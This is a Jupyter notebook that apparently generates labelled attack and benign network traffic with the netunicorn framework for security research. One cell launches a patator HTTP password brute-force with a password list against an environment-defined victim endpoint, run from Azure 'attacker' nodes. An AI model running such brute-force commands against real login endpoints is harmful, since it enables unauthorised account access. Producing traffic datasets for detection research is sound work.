In [1]:
import sys
sys.version

'3.9.0 (default, Nov 15 2020, 14:28:56) \n[GCC 7.3.0]'

In [2]:
%load_ext dotenv
%dotenv

In [3]:
import os

from netunicorn.base import MinionPool, Task, Minion
from netunicorn.base.experiment import Experiment, ExperimentStatus
from netunicorn.base.pipeline import Pipeline
from netunicorn.library.basic import ShellCommand
from netunicorn.client.remote import RemoteClient
from netunicorn.base.architecture import Architecture

In [4]:
class BenignTask(Task):
    def __init__(self, url1, url2):
        self.url1 = url1
        self.url2 = url2
    
    def run(self):
        import subprocess
        for i in range(500):
            subprocess.check_output(f'curl {self.url1}', shell=True)
            subprocess.check_output(f'curl {self.url2}', shell=True)
        return 0

In [5]:
attacker_pipeline = (
    Pipeline()
    .then(ShellCommand(
        "python ./patator.py http_fuzz "
        f"url={os.environ['VICTIM_ENDPOINT']} "
        "persistent=1 user_pass=FILE0:FILE0 0=/opt/patator/passwords.txt -x ignore:code=401"
    ))
)
attacker_pipeline.environment_definition.image = "redacted"

In [6]:
benign_pipeline = Pipeline().then(BenignTask(
    "redacted",
    "redacted",
))
benign_pipeline.environment_definition.image = "redacted"

In [7]:
client = RemoteClient(
    endpoint=os.environ['UNICORN_ENDPOINT'],
    login=os.environ['UNICORN_LOGIN'],
    password=os.environ['UNICORN_PASSWORD']
)

In [8]:
attacker_pool = MinionPool([Minion(name=x, properties={}, architecture=Architecture.LINUX_AMD64) for x in [
    'azure_attacker_1',
    'azure_attacker_2',
]])


benign_pool = MinionPool([Minion(name=x, properties={}, architecture=Architecture.LINUX_AMD64) for x in [
    'azure_benign_1',
    'azure_benign_2',
]])

In [9]:
experiment_label = 'connectors-0.1-attack'
experiment = Experiment().map(attacker_pool, attacker_pipeline)

In [10]:
client.prepare_experiment(experiment, experiment_label)

'connectors-0.1-attack'

In [11]:
client.start_execution(experiment_label)

'connectors-0.1-attack'

In [15]:
experiment_label = 'connectors-0.2-benign'
experiment = Experiment().map(benign_pool, benign_pipeline)

In [16]:
client.prepare_experiment(experiment, experiment_label)

'connectors-0.2-benign'

In [17]:
client.start_execution(experiment_label)

'connectors-0.2-benign'